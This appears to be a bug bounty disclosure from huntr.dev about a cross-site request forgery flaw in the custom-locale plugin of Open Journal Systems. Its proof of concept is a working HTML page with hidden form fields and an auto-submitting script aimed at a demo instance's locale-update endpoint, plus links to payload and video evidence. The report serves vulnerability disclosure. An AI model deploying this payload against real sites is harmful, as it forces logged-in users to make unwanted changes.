CSRF Edit Locale files

2023-09-2818:51:42

hainguyen0207

www.huntr.dev

csrf

locale

file edit

proof of concept

unwanted changes

user interaction

video poc

bug bounty

fake requests

AI Score

7.1

Confidence

Low

EPSS

0.001

Percentile

24.1%

JSON

Description

CSRF edit Locale files

Proof of Concept

1 .Attack sends fake requests to users

&lt;html&gt;
  &lt;body&gt;
&lt;form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/plugins/generic/custom- 
  locale/controllers/grid/custom-locale-grid/update-locale"&gt;
  &lt;input type="hidden" name="locale" value="en&#95;US" /&gt;
  &lt;input type="hidden" name="key" value="lib&#47;pkp&#47;locale&#47;en&#95;US&#47;common&#46;po" /&gt;
  &lt;input type="hidden" name="changes&#91;common&#46;publicKnowledgeProject&#93;" value="test1" /&gt;
  &lt;input type="hidden" name="changes&#91;common&#46;currentStyleSheet&#93;" value="test2" /&gt;
  &lt;input type="hidden" name="changes&#91;about&#46;description&#93;" value="test3" /&gt;
  &lt;input type="hidden" name="submitFormButton" value="" /&gt;
  &lt;input type="submit" value="Submit request" /&gt;
&lt;/form&gt;
&lt;script&gt;
  history.pushState('', '', '/');
  document.forms[0].submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

2 .User click, edited unwanted Locale files

Payload Poc

https://drive.google.com/file/d/1wpgmDoK0fGsiPSKfThVoEWq50pj7sBz5/view?usp=sharing

Video Poc

https://drive.google.com/file/d/1WlOkyzHKatJgMJ8KQ7yH-edoLMXM5yZ4/view?usp=sharing